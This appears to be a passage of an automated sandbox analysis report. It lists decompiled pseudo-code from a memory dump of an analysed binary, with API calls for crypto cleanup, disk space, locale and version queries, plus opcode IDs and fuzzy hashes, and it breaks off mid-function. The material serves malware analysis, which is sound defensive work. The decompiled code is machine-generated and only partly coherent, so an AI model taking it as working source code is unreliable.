                                                • Instruction Fuzzy Hash: B541C575D00209DFCB00CFAAE9819ADBBF1FB08305B20843AE505E7661D778A956CF69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 78%
                                                			E004F29AC() {
                                                				intOrPtr _t29;
                                                				intOrPtr _t37;
                                                				intOrPtr _t39;
                                                				signed int _t44;
                                                				intOrPtr _t45;
                                                				intOrPtr _t48;
                                                				void* _t50;
                                                
                                                				_pop(_t48);
                                                				 *[fs:eax] = _t48;
                                                				_push(E004F2A76);
                                                				 *((intOrPtr*)(_t50 - 0xb0)) =  *((intOrPtr*)(_t50 - 0x40)) + 0x42;
                                                				asm("fild dword [ebp-0xb0]");
                                                				 *((intOrPtr*)(_t50 - 0x3c)) = E004048CC();
                                                				 *((intOrPtr*)(_t50 - 0x44)) =  *((intOrPtr*)(_t50 - 0x54)) -  *((intOrPtr*)(_t50 - 0x34));
                                                				 *((intOrPtr*)(_t50 - 0x4c)) = 0;
                                                				while( *((intOrPtr*)(_t50 - 0x4c)) < 5) {
                                                					 *((intOrPtr*)(_t50 - 0x4c)) =  *((intOrPtr*)(_t50 - 0x4c)) + 1;
                                                					_t45 =  *0x4fef40; // 0x3c79b5d4
                                                					 *0x4feecc = _t45;
                                                				}
                                                				_t29 =  *0x4feee0; // 0x747938b
                                                				 *0x4feee0 = E0040489C(_t29);
                                                				asm("fild dword [ebp-0x48]");
                                                				 *((intOrPtr*)(_t50 - 0x2c)) = E004048D8();
                                                				 *((intOrPtr*)(_t50 - 0x58)) =  *((intOrPtr*)(_t50 - 0x38));
                                                				CryptDestroyKey( *(_t50 - 0x60));
                                                				E00406CF4(_t50 - 0x14,  *((intOrPtr*)(_t50 - 0x14)));
                                                				_t37 =  *0x4feed8; // 0x1cb9338e
                                                				 *0x4feed8 = E0040489C(_t37);
                                                				_t39 =  *0x4feee8; // 0xdcd0f434
                                                				 *0x4feee8 = E0040489C(_t39);
                                                				asm("fild dword [ebp-0x28]");
                                                				 *((intOrPtr*)(_t50 - 0x2c)) = E004048CC();
                                                				 *((intOrPtr*)(_t50 - 0x30)) =  *((intOrPtr*)(_t50 - 0x44)) +  *((intOrPtr*)(_t50 - 0x1c));
                                                				_t44 =  *0x4feee0; // 0x747938b
                                                				E004FEF0C = _t44;
                                                				return _t44;
                                                			}










                                                0x004f29ae
                                                0x004f29b1
                                                0x004f29b4
                                                0x004f29bf
                                                0x004f29c5
                                                0x004f29d0
                                                0x004f29d9
                                                0x004f29de
                                                0x004f29e5
                                                0x004f29e7
                                                0x004f29ea
                                                0x004f29ef
                                                0x004f29f4
                                                0x004f29fa
                                                0x004f2a04
                                                0x004f2a09
                                                0x004f2a11
                                                0x004f2a17
                                                0x004f2a1e
                                                0x004f2a2a
                                                0x004f2a2f
                                                0x004f2a39
                                                0x004f2a3e
                                                0x004f2a48
                                                0x004f2a4d
                                                0x004f2a55
                                                0x004f2a5e
                                                0x004f2a61
                                                0x004f2a66
                                                0x004f2a6b

                                                APIs
                                                • CryptDestroyKey.ADVAPI32(?), ref: 004F2A1E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CryptDestroy
                                                • String ID:
                                                • API String ID: 1712904745-0
                                                • Opcode ID: adfb67dfda337f39f1045ffdcecc14f3610f63a23ece4600cd6ad55a4d5bcfd5
                                                • Instruction ID: bde1d7b12404d46a9181efcc3a83b797575d461b1706a2a29f43076dfc1ab377
                                                • Opcode Fuzzy Hash: adfb67dfda337f39f1045ffdcecc14f3610f63a23ece4600cd6ad55a4d5bcfd5
                                                • Instruction Fuzzy Hash: C621D3B5D00248DFCB00EFAAE945AADBBF1FB48309F15883AE504E7220D7749851CF19
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00414A38(WCHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
                                                				long _v8;
                                                				long _v12;
                                                				long _v16;
                                                				long _v20;
                                                				intOrPtr _v24;
                                                				signed int _v28;
                                                				WCHAR* _t25;
                                                				int _t26;
                                                				intOrPtr _t31;
                                                				intOrPtr _t34;
                                                				intOrPtr* _t37;
                                                				intOrPtr* _t38;
                                                				intOrPtr _t46;
                                                				intOrPtr _t48;
                                                
                                                				_t25 = _a4;
                                                				if(_t25 == 0) {
                                                					_t25 = 0;
                                                				}
                                                				_t26 = GetDiskFreeSpaceW(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
                                                				_v28 = _v8 * _v12;
                                                				_v24 = 0;
                                                				_t46 = _v24;
                                                				_t31 = E00408080(_v28, _t46, _v16, 0);
                                                				_t37 = _a8;
                                                				 *_t37 = _t31;
                                                				 *((intOrPtr*)(_t37 + 4)) = _t46;
                                                				_t48 = _v24;
                                                				_t34 = E00408080(_v28, _t48, _v20, 0);
                                                				_t38 = _a12;
                                                				 *_t38 = _t34;
                                                				 *((intOrPtr*)(_t38 + 4)) = _t48;
                                                				return _t26;
                                                			}

















                                                0x00414a3f
                                                0x00414a44
                                                0x00414a46
                                                0x00414a46
                                                0x00414a59
                                                0x00414a68
                                                0x00414a6b
                                                0x00414a78
                                                0x00414a7b
                                                0x00414a80
                                                0x00414a83
                                                0x00414a85
                                                0x00414a92
                                                0x00414a95
                                                0x00414a9a
                                                0x00414a9d
                                                0x00414a9f
                                                0x00414aa8

                                                APIs
                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?), ref: 00414A59
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: DiskFreeSpace
                                                • String ID:
                                                • API String ID: 1705453755-0
                                                • Opcode ID: 209b71cca9859ecba50bab76360ac8db5df658651ecb909a5f4618f075e5672f
                                                • Instruction ID: 310fcf2c77c2509cbee9bbfb9c451f4b98ed5f5819f213a9bf3bd4eaa5670cf9
                                                • Opcode Fuzzy Hash: 209b71cca9859ecba50bab76360ac8db5df658651ecb909a5f4618f075e5672f
                                                • Instruction Fuzzy Hash: 73111EB5E00209AFDB00CF99C981DEFF7F9EFC8304B14C56AA508E7250E6319E418BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 82%
                                                			E004F2C93() {
                                                				signed int _t25;
                                                				intOrPtr _t31;
                                                				intOrPtr _t39;
                                                				intOrPtr _t45;
                                                				void* _t49;
                                                
                                                				 *(_t49 - 0x34) =  *(_t49 - 0x58) * 0xbe;
                                                				 *(_t49 - 0x38) =  *(_t49 - 0x4c) * 0x56;
                                                				 *((intOrPtr*)(_t49 - 0x40)) =  *((intOrPtr*)(_t49 - 0x1c)) + 0x48;
                                                				 *(_t49 - 0x48) =  *(_t49 - 0x24) * 0xdc;
                                                				_t25 = E004FEF00; // 0xa3b3f6c0
                                                				 *0x4feecc = _t25 + 0x51;
                                                				_pop(_t45);
                                                				 *[fs:eax] = _t45;
                                                				_push(E004F2D48);
                                                				_t29 =  *((intOrPtr*)(_t49 - 0x28)) + 0x80;
                                                				 *((intOrPtr*)(_t49 - 0xb0)) =  *((intOrPtr*)(_t49 - 0x28)) + 0x80;
                                                				asm("fild dword [ebp-0xb0]");
                                                				 *(_t49 - 0x38) = E004048CC();
                                                				_t31 =  *0x4fef18; // 0xbc3e19a
                                                				 *0x4fef18 = E0040489C(_t31);
                                                				 *((intOrPtr*)(_t49 - 0x44)) = E004F0EBC(_t49 - 0x58, 0x4fef04, _t29);
                                                				 *((intOrPtr*)(_t49 - 0x50)) = E004F0EBC(_t49 - 0x48, _t49 - 0x48, _t29);
                                                				E00406CF4(_t49 - 0x18,  *((intOrPtr*)(_t49 - 0x14)));
                                                				_t39 =  *0x4fef40; // 0x3c79b5d4
                                                				 *0x4fef40 = E0040489C(_t39);
                                                				return CryptReleaseContext( *(_t49 - 0x5c), 0);
                                                			}








                                                0x004f2c9a
                                                0x004f2ca1
                                                0x004f2caa
                                                0x004f2cb4
                                                0x004f2cb7
                                                0x004f2cbf
                                                0x004f2cc6
                                                0x004f2cc9
                                                0x004f2ccc
                                                0x004f2cd4
                                                0x004f2cd9
                                                0x004f2cdf
                                                0x004f2cea
                                                0x004f2ced
                                                0x004f2cf7
                                                0x004f2d09
                                                0x004f2d17
                                                0x004f2d20
                                                0x004f2d25
                                                0x004f2d2f
                                                0x004f2d40

                                                APIs
                                                • CryptReleaseContext.ADVAPI32(?,00000000,004F2D48), ref: 004F2D3A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: ContextCryptRelease
                                                • String ID:
                                                • API String ID: 829835001-0
                                                • Opcode ID: 2508b981cd3e5ab04e372f066ae1b432449da907089afa8b7a10d9466cce5779
                                                • Instruction ID: f8ddac3f8c059c40fd4a3dc070d7f264bafdc1d546db5608a0300e7177421ee5
                                                • Opcode Fuzzy Hash: 2508b981cd3e5ab04e372f066ae1b432449da907089afa8b7a10d9466cce5779
                                                • Instruction Fuzzy Hash: 4F11E6B1D042499FDB00DFA6D982AADBBF4FF44305F14843AE104EB265E7349955CF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0041622C(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
                                                				short _v516;
                                                				void* __ebp;
                                                				int _t5;
                                                				intOrPtr _t10;
                                                				void* _t18;
                                                
                                                				_t18 = __ecx;
                                                				_t10 = _a4;
                                                				_t5 = GetLocaleInfoW(__eax, __edx,  &_v516, 0x100);
                                                				_t19 = _t5;
                                                				if(_t5 <= 0) {
                                                					return E00406CAC(_t10, _t18);
                                                				}
                                                				return E00406B30(_t10, _t5 - 1,  &_v516, _t19);
                                                			}








                                                0x00416237
                                                0x00416239
                                                0x0041624a
                                                0x0041624f
                                                0x00416251
                                                0x00000000
                                                0x00416269
                                                0x00000000

                                                APIs
                                                • GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 0041624A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID:
                                                • API String ID: 2299586839-0
                                                • Opcode ID: ae301264ba2bf15c5c2dd3133757143b7a750ea8d2995ba638d714bb6a53c66c
                                                • Instruction ID: f625ba6ba6b3d8b3a91a5d1e9e8c9525722b30be3d60684afc827c81cf67b692
                                                • Opcode Fuzzy Hash: ae301264ba2bf15c5c2dd3133757143b7a750ea8d2995ba638d714bb6a53c66c
                                                • Instruction Fuzzy Hash: B5E0927170421416E710A9AA8C86AEB725CAB48700F0001BFBE05D7382ED78AD5043E9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • EnumSystemLocalesW.KERNEL32(00419524,00000002), ref: 007899F9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: EnumLocalesSystem
                                                • String ID:
                                                • API String ID: 2099609381-0
                                                • Opcode ID: feef24f460d5e549b8aeb2b3b0c04314108616cecc793de7b9d3d996168a5535
                                                • Instruction ID: e24790ca3697e510957b760858055a37519eb5306651d2f77419d348c9c0ffb3
                                                • Opcode Fuzzy Hash: feef24f460d5e549b8aeb2b3b0c04314108616cecc793de7b9d3d996168a5535
                                                • Instruction Fuzzy Hash: 70E04F62B41A51CAD924B7A80C8BB997A425F41FE1F0C8231B64C9B297DA9E0C1582E6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 72%
                                                			E0041977C(void* __edx) {
                                                				intOrPtr _t2;
                                                				intOrPtr _t7;
                                                				void* _t11;
                                                				intOrPtr _t13;
                                                				void* _t14;
                                                				void* _t15;
                                                
                                                				_t11 = __edx;
                                                				if(__edx != 0) {
                                                					_t15 = _t15 + 0xfffffff0;
                                                					_t2 = E004054AC(_t2, _t14);
                                                				}
                                                				_t13 = _t2;
                                                				E00404E74(0);
                                                				 *((intOrPtr*)(E0040B254() + 0x10)) = _t13;
                                                				EnumSystemLocalesW(E00419524, 2);
                                                				_t7 = _t13;
                                                				if(_t11 != 0) {
                                                					E00405504(_t7);
                                                					_pop( *[fs:0x0]);
                                                				}
                                                				return _t13;
                                                			}









                                                0x0041977c
                                                0x00419780
                                                0x00419782
                                                0x00419785
                                                0x00419785
                                                0x0041978c
                                                0x00419792
                                                0x0041979c
                                                0x004197a9
                                                0x004197ae
                                                0x004197b2
                                                0x004197b4
                                                0x004197b9
                                                0x004197c0
                                                0x004197c7

                                                APIs
                                                • EnumSystemLocalesW.KERNEL32(00419524,00000002,?,?,00419AFD,004166F5,?,00000000,00416736,?,?,?,00000000,00000000), ref: 004197A9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: EnumLocalesSystem
                                                • String ID:
                                                • API String ID: 2099609381-0
                                                • Opcode ID: feef24f460d5e549b8aeb2b3b0c04314108616cecc793de7b9d3d996168a5535
                                                • Instruction ID: a9934d59bb7832b9fccc1f771c8c07b01b67a9ab148d17b03577bf933f69f1b6
                                                • Opcode Fuzzy Hash: feef24f460d5e549b8aeb2b3b0c04314108616cecc793de7b9d3d996168a5535
                                                • Instruction Fuzzy Hash: 1CE0D87274091186C110B7A60C42BC67541CF80FA4F0C4136F5549B3C6D73D0D4001DD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetLocaleInfoW.KERNEL32(?,0000000F,?,00000002,0000002C,?,?,?,007865CA,?,00000001,00000000,00416589), ref: 007864DB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID:
                                                • API String ID: 2299586839-0
                                                • Opcode ID: 662c2e2a362e0e1e219e5aa93ad40bd7f97650782cbc3b7f299320d7b3e2ef68
                                                • Instruction ID: 255fda3fd34550e71d60a43e4deb9286ca03585d89bd455684157c8a9cdac8f9
                                                • Opcode Fuzzy Hash: 662c2e2a362e0e1e219e5aa93ad40bd7f97650782cbc3b7f299320d7b3e2ef68
                                                • Instruction Fuzzy Hash: 8FD0A7AA30926076E220A15B6D45E7B56DCCBC97B1F10843BBA4CC6102D254CD05D3B1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 79%
                                                			E00416278(int __eax, signed int __ecx, int __edx) {
                                                				short _v16;
                                                				signed int _t5;
                                                				signed int _t10;
                                                
                                                				_push(__ecx);
                                                				_t10 = __ecx;
                                                				if(GetLocaleInfoW(__eax, __edx,  &_v16, 2) <= 0) {
                                                					_t5 = _t10;
                                                				} else {
                                                					_t5 = _v16 & 0x0000ffff;
                                                				}
                                                				return _t5;
                                                			}






                                                0x0041627b
                                                0x0041627c
                                                0x00416292
                                                0x0041629a
                                                0x00416294
                                                0x00416294
                                                0x00416294
                                                0x004162a0

                                                APIs
                                                • GetLocaleInfoW.KERNEL32(?,0000000F,?,00000002,0000002C,?,?,?,0041637A,?,00000001,00000000,00416589), ref: 0041628B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID:
                                                • API String ID: 2299586839-0
                                                • Opcode ID: 662c2e2a362e0e1e219e5aa93ad40bd7f97650782cbc3b7f299320d7b3e2ef68
                                                • Instruction ID: c50587a9491627284d489150336fa1a9533c3ccd5259e08eb00d0e525ec2dd1a
                                                • Opcode Fuzzy Hash: 662c2e2a362e0e1e219e5aa93ad40bd7f97650782cbc3b7f299320d7b3e2ef68
                                                • Instruction Fuzzy Hash: 6AD05EA630932026E210659B6D45EB767DCCBC87A1F11487BBA48C7242D224DC4692B9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 72%
                                                			E004161DC(long long __fp0) {
                                                				long long _v8;
                                                				struct _SYSTEMTIME _v24;
                                                				void* _t16;
                                                				long long* _t21;
                                                				void* _t22;
                                                				long long _t23;
                                                
                                                				_t23 = __fp0;
                                                				GetLocalTime( &_v24);
                                                				E004161AC(_v24.wYear & 0x0000ffff, _v24.wDay & 0x0000ffff, _v24.wMonth & 0x0000ffff, _t22, __fp0);
                                                				_v8 = _t23;
                                                				asm("wait");
                                                				_t16 = E00416064(_v24.wHour & 0x0000ffff, _v24.wSecond & 0x0000ffff, _v24.wMinute & 0x0000ffff, _t22, _t23, _v24.wMilliseconds & 0x0000ffff);
                                                				 *_t21 = _t23 + _v24.wSecond;
                                                				asm("wait");
                                                				return _t16;
                                                			}









                                                0x004161dc
                                                0x004161e4
                                                0x004161f8
                                                0x004161fd
                                                0x00416201
                                                0x00416217
                                                0x00416220
                                                0x00416223
                                                0x0041622a

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: LocalTime
                                                • String ID:
                                                • API String ID: 481472006-0
                                                • Opcode ID: 4c324c57baaa4337ea7f551687ea544c5109c22b35e03cb040a5c8e8c96d9f02
                                                • Instruction ID: 76a2f1c11297a918a7ed5d06ca1ce718a12101429215186c4d1468f8f04b7f04
                                                • Opcode Fuzzy Hash: 4c324c57baaa4337ea7f551687ea544c5109c22b35e03cb040a5c8e8c96d9f02
                                                • Instruction Fuzzy Hash: AEE0456040D622A1C244AF56C44147EFBE5AED5B42F418D5EF9D840191EB39C5E8D36B
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00419540(int __eax, void* __ecx, int __edx) {
                                                				short _v2052;
                                                				void* _t6;
                                                				void* _t12;
                                                
                                                				_t6 = __ecx;
                                                				_v2052 = 0;
                                                				GetLocaleInfoW(__eax, __edx,  &_v2052, 0x400);
                                                				return E004073C4(_t6, 0x400, _t12);
                                                			}






                                                0x00419547
                                                0x00419549
                                                0x0041955b
                                                0x00419575

                                                APIs
                                                • GetLocaleInfoW.KERNEL32(00000000,00000003,?,00000400,?,004195F6,?,00000000,00419743), ref: 0041955B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID:
                                                • API String ID: 2299586839-0
                                                • Opcode ID: debcf87acf1eb127c1bd373d4cab38e1ff7a27e01fea92d12e705abb54d2d558
                                                • Instruction ID: db1d81e14ea03b045da2e4f7a1d74ade2f132b5090eeeeb2935953b77a593a1e
                                                • Opcode Fuzzy Hash: debcf87acf1eb127c1bd373d4cab38e1ff7a27e01fea92d12e705abb54d2d558
                                                • Instruction Fuzzy Hash: 4DD0A7D1B2420013E2041254CC42B663188DB84714F20403C7B84973C0EE7C6C1593EF
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040B008() {
                                                				signed int _t1;
                                                				unsigned int _t3;
                                                				signed int _t5;
                                                
                                                				_t1 = GetVersion();
                                                				_t5 = 0x000000ff & _t1;
                                                				_t3 = (_t1 & 0x0000ff00) >> 8;
                                                				if(0xff != 5 || _t3 < 1) {
                                                					if(_t5 <= 5) {
                                                						 *0x500980 = 0x409;
                                                						return _t3;
                                                					} else {
                                                						goto L3;
                                                					}
                                                				} else {
                                                					L3:
                                                					 *0x500980 = 0x7f;
                                                					return _t3;
                                                				}
                                                			}






                                                0x0040b008
                                                0x0040b012
                                                0x0040b019
                                                0x0040b01f
                                                0x0040b029
                                                0x0040b036
                                                0x0040b040
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040b02b
                                                0x0040b02b
                                                0x0040b02b
                                                0x0040b035
                                                0x0040b035

                                                APIs
                                                • GetVersion.KERNEL32(004FC0C9,00000400,00000000,004FC0D7), ref: 0040B008
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Version
                                                • String ID:
                                                • API String ID: 1889659487-0
                                                • Opcode ID: fe4eb533cf96d19368790485d4add68ea6a0ecd892399ed22462c525e80dcf4a
                                                • Instruction ID: 5c291ba5066d8f16202b2d1b80154b0eea179a8c4b929a6b24479bcc96ce923d
                                                • Opcode Fuzzy Hash: fe4eb533cf96d19368790485d4add68ea6a0ecd892399ed22462c525e80dcf4a
                                                • Instruction Fuzzy Hash: E3D09E75D1190245EA3057108E8537E2191E3E1704FD48577C11156AD6D77D8489624D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: da1566a2f6af9372ef5ff0064129cc8c7bd33331f23317b37220a35c5510ad97
                                                • Instruction ID: 76091647a8447486658d3f70d0d4a1f29eff2768570bf5f807864d4889ac966d
                                                • Opcode Fuzzy Hash: da1566a2f6af9372ef5ff0064129cc8c7bd33331f23317b37220a35c5510ad97
                                                • Instruction Fuzzy Hash: 54F0A976B006049FDF21CFA4C805BAE73B9EB89355F0481A5D80AD7246E338A9428B90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1f1654813ed5821a00b8b7144780f614f73eea8c4dc557e3c0d17b55d1bda45a
                                                • Instruction ID: c1f34be03cf0569538104f0038f02cfb84df381903d0011f2ebedd3a3241928c
                                                • Opcode Fuzzy Hash: 1f1654813ed5821a00b8b7144780f614f73eea8c4dc557e3c0d17b55d1bda45a
                                                • Instruction Fuzzy Hash: 76C0E9B550D6066E975C8F1AB480815FBE5FAC8324364C22EA01C83644D73154518A64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004088C4() {
                                                				signed int _t2;
                                                				_Unknown_base(*)()* _t8;
                                                
                                                				InitializeCriticalSection(0x502c0c);
                                                				 *0x502c24 = 0x7f;
                                                				_t2 = GetVersion() & 0x000000ff;
                                                				 *0x502c08 = _t2 - 6 >= 0;
                                                				if( *0x502c08 != 0) {
                                                					 *0x502bfc = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetThreadPreferredUILanguages");
                                                					 *0x502c00 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "SetThreadPreferredUILanguages");
                                                					_t8 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetThreadUILanguage");
                                                					 *0x502c04 = _t8;
                                                					return _t8;
                                                				}
                                                				return _t2;
                                                			}





                                                0x004088c9
                                                0x004088ce
                                                0x004088dc
                                                0x004088e4
                                                0x004088f2
                                                0x00408909
                                                0x00408923
                                                0x00408938
                                                0x0040893d
                                                0x00000000
                                                0x0040893d
                                                0x00408942

                                                APIs
                                                • InitializeCriticalSection.KERNEL32(00502C0C,004FC037,00000400,00000000,004FC0D7), ref: 004088C9
                                                • GetVersion.KERNEL32(00502C0C,004FC037,00000400,00000000,004FC0D7), ref: 004088D7
                                                • GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadPreferredUILanguages,00502C0C,004FC037,00000400,00000000,004FC0D7), ref: 004088FE
                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00408904
                                                • GetModuleHandleW.KERNEL32(kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,00502C0C,004FC037,00000400,00000000,004FC0D7), ref: 00408918
                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040891E
                                                • GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadUILanguage,00000000,kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,00502C0C,004FC037,00000400,00000000,004FC0D7), ref: 00408932
                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00408938
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp Download File
                                                Similarity
                                                • API ID: AddressHandleModuleProc$CriticalInitializeSectionVersion
                                                • String ID: GetThreadPreferredUILanguages$GetThreadUILanguage$SetThreadPreferredUILanguages$kernel32.dll
                                                • API String ID: 74573329-1403180336
                                                • Opcode ID: 2fb2495b3d5c3dfb0f0ff77069c3cae269b5980748a4b84856549e4c90eff2a1
                                                • Instruction ID: e8a77c3a15101be85d3cf790d40814baa31199bda3015ba45ff0e87435b2fea5
                                                • Opcode Fuzzy Hash: 2fb2495b3d5c3dfb0f0ff77069c3cae269b5980748a4b84856549e4c90eff2a1
                                                • Instruction Fuzzy Hash: C0F0F8E49403416CE25A77B29F9FB3D25446A10708F14853FB490B32D2CEFC08489A1F
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 84%
                                                			E00416CC0(void* __eax, void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, long long __fp0) {
                                                				signed int _v8;
                                                				intOrPtr _v12;
                                                				intOrPtr* _v16;
                                                				intOrPtr _v20;
                                                				intOrPtr _v24;
                                                				signed int _v28;
                                                				char _v32;
                                                				signed int _v36;
                                                				intOrPtr _v40;
                                                				intOrPtr _t64;
                                                				signed int _t68;
                                                				intOrPtr _t83;
                                                				intOrPtr* _t91;
                                                				intOrPtr* _t95;
                                                				intOrPtr _t99;
                                                				void* _t105;
                                                				intOrPtr _t106;
                                                				signed int _t107;
                                                				signed int _t110;
                                                				signed int _t111;
                                                				intOrPtr _t118;
                                                				intOrPtr _t128;
                                                				intOrPtr _t129;
                                                				long _t139;
                                                				void* _t144;
                                                				void* _t145;
                                                				intOrPtr* _t147;
                                                				void* _t149;
                                                				void* _t150;
                                                				void* _t152;
                                                				void* _t153;
                                                				intOrPtr _t154;
                                                				void* _t155;
                                                				void* _t157;
                                                				long long _t174;
                                                
                                                				_t174 = __fp0;
                                                				_t157 = __eflags;
                                                				_t152 = _t153;
                                                				_t154 = _t153 + 0xffffffdc;
                                                				_v32 = 0;
                                                				_v8 = __edx;
                                                				_t105 = __eax;
                                                				_push(_t152);
                                                				_push(0x416f65);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t154;
                                                				E00405720();
                                                				E004058A8(E00405B20(0, __edx, _t157), __edx | 0xffffffff, _t157);
                                                				_push(_t152);
                                                				_push(0x416f48);
                                                				_push( *[fs:edx]);
                                                				 *[fs:edx] = _t154;
                                                				 *0x50379c = 0;
                                                				_push(0);
                                                				E00408478();
                                                				_t155 = _t154 + 4;
                                                				E0041622C(_t105, 0x416f80, 0x100b,  &_v32);
                                                				_t139 = E004147DC(0x416f80, 1, _t157);
                                                				if(_t139 + 0xfffffffd - 3 >= 0) {
                                                					__eflags = _t139 - 0xffffffffffffffff;
                                                					if(_t139 - 0xffffffffffffffff < 0) {
                                                						 *0x50379c = 1;
                                                						_push(1);
                                                						E00408478();
                                                						_t155 = _t155 + 4;
                                                						E00406CAC( *0x5037a0, L"B.C.");
                                                						 *((intOrPtr*)( *0x5037a0 + 4)) = 0;
                                                						_t83 =  *0x5037a0;
                                                						 *((intOrPtr*)(_t83 + 8)) = 0xffc00000;
                                                						 *((intOrPtr*)(_t83 + 0xc)) = 0xc1dfffff;
